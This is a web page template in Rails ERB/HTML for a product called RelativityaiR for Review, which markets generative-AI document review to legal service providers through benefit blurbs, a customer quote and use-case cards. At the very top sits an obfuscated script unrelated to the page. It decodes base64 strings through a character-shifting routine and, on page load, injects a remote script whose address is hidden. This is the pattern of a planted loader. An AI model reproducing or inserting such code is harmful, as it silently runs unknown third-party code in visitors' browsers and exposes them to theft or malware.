<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "relativity/relair-hero.webp", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <div class="heading-decorated heading-decorated_center text-center">
                    <%= image_tag 'relativity/RelativityaiR-logo-white.png', class: 'img-fluid', style: 'width: 30rem;' %>
                </div>            
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-center">
      <div class="col-10">
        <article class="post-wide text-center">
          <h5>RelativityaiR for Review uses generative AI to help you win more business and simplify 
          review processes. Surface valuable, hidden insights and deliver the best possible outcomes for your clients, all while 
          cementing your position as a trusted and best-in-class advisor. 
          </h5>
            <br> 
            <br>
          <div class="row">
            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-paper-plane"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Deliver more with review:</strong></h5>
              <p>Provide fast and accurate
              results, alongside citations and in-depth rationale that helps guide decisions and makes and your clients’ 
              downstream legal work more effective. </p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
                <div class="blurb-tiny__icon linear-icon-unlock"></div>
                <h5 class="blurb-tiny__title text-primary"><strong>Unlock added revenue:</strong></h5>
                <p>Take on any project and win new opportunities that previously weren’t possible due to cost and time.</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-file-charts"></div>
              <h5 class="blurb-tiny__title text-primary"><strong>Stay ahead in a new AI era:</strong></h5>
              <p>Establish expertise in the latest technology so you can guide clients when they come asking for generative AI. </p>
            </article>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="bg-accent-2 py-5 text-center">
  <div class="container">
    <div class="row row-50 justify-content-center">
      <div class="col-lg-10 col-xl-10">
        <p class="heading-decorated" ></p>
        <div class="row justify-content-center" style="font-size:1.2rem !important">
            <div class="col-10 col-md-8 ">
                <p>“In testing on live cases and reviewing other publicized results, we’ve seen
                aiR perform significantly better than human review, achieving 90&#37;&#43; recall without 
                the upfront training needed in TAR or an active learning model.”
                </p>
                <p><strong>SERVICE PROVIDER CUSTOMER</strong></p>
            </div>
        </div>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-10">
        <h3 class="text-primary mb-3 mt-5">RelativityaiR For Review</h3>
        <div class="row pt-5 g-4">
          <div class="col-12 col-lg-4 mb-5">
            <div class="card h-100">
              <div class="card-header text-white text-center" style="background-color: #2367A3;">
               <strong> Relevance Review </strong>
              </div>
              <div class="card-body text-center custom-card">
                <p class="card-text">Predict relevant documents for production</p>
              </div>
            </div>
          </div>

          <div class="col-12 col-lg-4 mb-5">
          <div class="card h-100">
            <div class="card-header text-white text-center" style="background-color: #2367A3;">
               <strong> Issues Review </strong>
              </div>
              <div class="card-body text-center custom-card">
                <p class="card-text">Locate material related to various legal issues</p>
              </div>
            </div>
          </div>

          <div class="col-12 col-lg-4 mb-5">
          <div class="card h-100">
            <div class="card-header text-white text-center" style="background-color: #2367A3;">
               <strong> Key Document Identification </strong>
              </div>
              <div class="card-body text-center custom-card" style="">
                <p class="card-text">Find hot documents that are often found late or missed</p>
              </div>
            </div>
          </div>

        </div>
      </div>
    </div>
  </div>
</section>



<section class="section-lg bg-default">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-10 bg-gray-lighter p-5" style="border-radius:3px">
        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-file-preview icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Conduct first-pass review:</strong> Create more value for your customers by finding relevant documents 
            in a reliable, fast, and cost-effective way.</p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-file-code icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Issue code your own documents:</strong> Provide additional value in review projects with faster, 
            less costly issue coding that would previously have taken too much time and money</p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-speed-fast icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Tackle new project types:</strong>  Use aiR’s speed to conduct time critical reviews or minimize 
            the number of attorneys that need to look at confidential data in sensitive projects</p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-eye icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>QC traditional review:</strong>  Find and fix manual errors before they go out the door 
                by comparing aiR for Review’s coding to decisions to those made by reviewers
            </p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-files icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Gather early case insights:</strong> Uncover important information at the very 
            beginning of a project, performing at an unmatched pace and better serving your clients
            </p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-cog icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Train active learning:</strong> Improve your automated review process using 
            aiR to help develop a higher quality seed set, leading to better results
            </p>
          </div>
        </div>

        <div class="d-flex flex-column flex-md-row align-items-center text-md-start py-4">
          <div class=" mb-3 mb-md-0">
            <i class="linear-icon-clipboard-check icon-md" style="font-size:2rem; color:#2367A3;"></i>
          </div>

          <div class=" mx-md-3 my-3 my-md-0" style="flex-shrink: 0;">
            <div class="line line-vertical"></div>
            <div class="line line-horizontal" ></div>
          </div>

          <div>
            <p><strong>Analyze productions:</strong> Reduce the effort to find what matters and serve as 
            a trusted advisor by getting important documents into the hands of stakeholders sooner
            </p>
          </div>
        </div>

      </div>
    </div>
  </div>
</section>

<section>
  <section class="section">
    <div class="parallax-content">
      <div class="section-md text-center">
        <div class="container">
          <h3 class="heading-decorated"></h3>

          <div class="d-flex w-100 flex-row justify-content-center flex-wrap mt-4">
            <%= image_tag 'relativity/relair-logo.png', class: 'img-fluid w-50' %>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>